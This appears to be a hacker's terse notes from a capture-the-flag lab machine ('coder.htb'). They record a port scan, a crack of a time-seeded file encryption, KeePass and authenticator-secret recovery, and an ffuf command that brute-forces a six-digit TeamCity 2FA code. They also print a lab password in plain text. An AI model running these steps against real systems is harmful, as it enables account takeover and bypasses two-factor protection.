PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49681/tcp open unknown
49690/tcp open unknown
49702/tcp open unknown
49712/tcp open unknown
62971/tcp open unknown
anonymous SMB
Encrypter.exe and s.blade.enc
symmetric encryption algorithm
Convert.ToInt32(DateTimeOffset.Now.ToUnixTimeSeconds() => let's use the file write time of Fri Nov 11 14:17:08 2022
1668205028
just gonna copy the code and re run it. but change the encryptor to decryptor
its a 7zip: s.blade.kdbx, .key
in firefox
about:config
signon.management.page.fileimport.enabled
ffuf -w /usr/share/seclists/Fuzzing/6-digits-000000-999999.txt -X POST -d "password=FUZZ" -u <https://teamcity-dev.coder.htb/2fa.html> -mc 302 -b "TCSESSIONID=EBCF65A769955C5FAF9DF683176798DE" -b "__test=1" -
t 200 -H "X-Tc-Csrf-Token: c934e656-94e2-4793-aeb9-aa565dd54595" -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -H "X-Teamcity-Client: Web UI" -H "X-Requested-With: XMLHttpRequest" -http2
shove the shit into keepass
s.blade teamcity is veh5nUSZFFoqz9CrrhSeuwhA
Google the json fields to find the extesion
"encrypted" "hash" "index" "type" "secret" "issuer" "account"
its authenticator
format the json
{
"6132e897-44a2-4d14-92d2-12954724e83f": {
"encrypted": true,
"hash": "6132e897-44a2-4d14-92d2-12954724e83f",
"index": 1,
"type": "totp",
"secret": "U2FsdGVkX1+3JfFoKh56OgrH5jH0LLtc+34jzMBzE+QbqOBTXqKvyEEPKUyu13N2",
"issuer": "TeamCity",
"account": "s.blade"
}
}
and reimprot with the password